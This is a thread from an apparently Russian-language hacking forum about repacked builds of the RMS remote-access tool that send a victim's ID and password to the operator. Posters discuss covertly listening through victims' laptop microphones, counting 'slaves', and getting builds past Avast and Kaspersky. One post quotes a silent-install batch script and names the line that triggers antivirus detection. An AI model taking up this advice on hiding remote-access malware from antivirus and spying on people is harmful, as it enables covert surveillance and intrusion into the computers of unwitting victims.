RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. zag78
    zag78 Новичок
    Симпатии:
    0
    ребята, вопрос- почему отказались от прямого патчинга

21 окт 2013
  2. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    При патчинге теряется цифровая подпись файлов, а для ав это как команда фас!

21 окт 2013
  3. Ohiles028
    Ohiles028 Новичок
    Симпатии:
    0
    Всем привет,кто знает почему файловый менеджер рабочий стол не открывает?

22 окт 2013
  4. ULTIMATUS
    ULTIMATUS Новичок
    Симпатии:
    0
    подскажите, что писать в cmd, чтобы при запуске, прежде чем он начнёт устанавливаться, все хвосты от программы и сама программа удалилась полностью

в теме не нашёл. может плохо искал )

24 окт 2013
  5. ZeTRoY
    ZeTRoY Новичок
    Симпатии:
    0
    Всем привет!
    Подскажите по поводу прослушки с микрофона(т.е. нужно слушать что происходит в помещении). У жертвы ноут.

Версия RMS 5.5
    К микрофону подключится не могу, микрофон менял в настройках - тишина.
    Видео, кстате, работает, звук - нет :(
    Нужно копать в сторону дров на машине жертвы ? Или куда-то в другом направлении ?

24 окт 2013
  6. wald78
    wald78 Новичок
    Симпатии:
    1
    Всем привет! Последний АВ 2014 неплохо ловит сборки :( кому то получилось обойти его???

25 окт 2013
  7. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Avast 2014 сжирает rfusclient.exe версии 5.5 зато мою сборку 5.4 проверяет и без проблем запускает!

25 окт 2013
  8. ULTIMATUS
    ULTIMATUS Новичок
    Симпатии:
    0
    помоги пожалуйста, возможно ли сделать полное удаление сборки перед установкой

25 окт 2013
  9. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Всё можно если почитать! Здесь уже выкладывали батники для удаления версии 5.4 и 5.5

25 окт 2013
  10. beniamin
    beniamin Новичок
    Симпатии:
    0
    о ты не поможешь что бы у нас тоже не спалило?
    может совет отдашь где что ковырять?

26 окт 2013
  11. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Сначала нужно глянуть на батник так на вскидку сказать не смогу! Как минимум сменить версию на 5.4 (от 5.5. мало чем отличается) дабы 5.5 аваст 2014 как я писал выше сжирает файл rfusclient.exe

26 окт 2013
  12. GeForse
    GeForse Новичок
    Симпатии:
    4
    Тестил с Авастом на ВМ версии 5.5 и более старые, так вот на 5.5 он сразу да кидается как на красную тряпку, причем кидает на карантин (но если на карантине его запустить на проверку то он заявляет что все чисто) похоже он в базы уже занесен как программа для удаленного доступа(пишет: Win32:Evo-gen[susp])
    На версиях более старых ругается на батник(пишет: BV:Agent-ANP[Trj]), а именно:
    Код:
    @echo off
    @chcp 1251
    mkdir "%ProgramFiles%\Remote Manipulator System - Host"
    copy winmm.dll "%ProgramFiles%\Remote Manipulator System - Host" >nul
    @if not exist %ProgramFiles%\Remote Manipulator System - Host\rutserv.exe (goto inst) else (goto exit)
    А точнее на
    Код:
    copy winmm.dll "%ProgramFiles%\Remote Manipulator System - Host" >nul
    Похоже Аваст не разрешает ничего по тихому копировать в системный раздел, заменял ProgramFiles на что угодно и он молчит:)
    А так отдельно сканировал exe 5.5 версии, он молчит
    А касперский орет вроде на все сборки одинаково

26 окт 2013
  13. Rmist
    Rmist Новичок
    Симпатии:
    1
    Парни, уже крыша едет: поставил себе хост 5.5.2 (чистый официал). Не могу подключится - введите пароль и все. Я и отключал его (пароль) и варианты разные пробовал, а толку 0 целых, 0 десятых. Вьевер пробовал от 5.2 до 5.5.3 - одно и тоже. Старые хосты подключаются без проблем. Пошел к соседу, поставили на его комп. Id виден, пароль так же не подходит. У меня есет секьюрити у соседа аваст, оба молчат.
    Куда копать?

28 окт 2013
  14. deity
    deity Новичок
    Симпатии:
    7
    я раньше использовал rms5.3.1b2. недавно пересел на 5.5 от бернса, сравнительно недавно. уже достаточно много слэйвов. лоадерами не пользуюсь. недавно появилась необходимость точечного применения. кидаю файл через скайп без склейки - сожрал ав, какой именно - я хз. какую версию посоветуете сейчас пересобрать? какая наименее палевная? интересует мнение авторитетных персон и ценителей софта

29 окт 2013
  15. sanygood
    sanygood Новичок
    Симпатии:
    0
    подскажите пожалуйста,есть ли возможность прослушивать микрофон с веб камеры на буке,если он выключен? может прога какая есть? нужна именно прослушка. спасибо.

4 ноя 2013
  16. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    По умолчанию микрофон в ноутбуке включен поэтому через рмс можно прослушать через режим "Удаленная камера" только в настройках убрать галочку с вебкмеры!

4 ноя 2013
  17. sanygood
    sanygood Новичок
    Симпатии:
    0

5 ноя 2013
  18. 4ekkk
    4ekkk Новичок
    Симпатии:
    7

5 ноя 2013
  19. Gray